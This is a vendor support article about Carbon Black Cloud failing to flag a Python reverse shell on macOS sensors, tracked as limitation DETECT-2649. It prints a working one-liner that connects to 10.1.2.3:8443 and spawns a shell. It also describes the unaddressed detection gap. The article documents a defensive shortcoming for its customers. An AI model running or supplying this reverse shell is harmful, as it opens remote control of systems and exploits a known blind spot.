CBC: A certain reverse shell example is not generating a REVERSE_SHELL TTP or alert for MacOS sensors.
search cancel

CBC: A certain reverse shell example is not generating a REVERSE_SHELL TTP or alert for MacOS sensors.

book

Article ID: 288256

calendar_today

Updated On:

Products

Carbon Black Cloud Endpoint Standard (formerly Cb Defense) Carbon Black Cloud Enterprise EDR (formerly Cb Threathunter)

Issue/Introduction


Run this command generated by Google's reverse shell generator at :

https://revshells.com/

python -c 'import sys, socket,os,pty;s=socket.socket();s.connect(("10.1.2.3",8443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("sh")'

  • find the netconn on the investigate page with the search: netconn_ipv4:10.1.2.3
  • Note that there is no TTP "reverse_shell" or alert fired (Filter on TTP "reverse_shell")

Environment

  • CBC sensor: All versions
  • CBC Console: All versions
  • Apple MacOS: All versions

Cause

This is limitation DETECT-2649.

Resolution

DETECT-2649, which concerns the particular class of Reverse Shell code wrapped in python interpreter, will be addressed in future rules iterations.
Powered by Wolken Software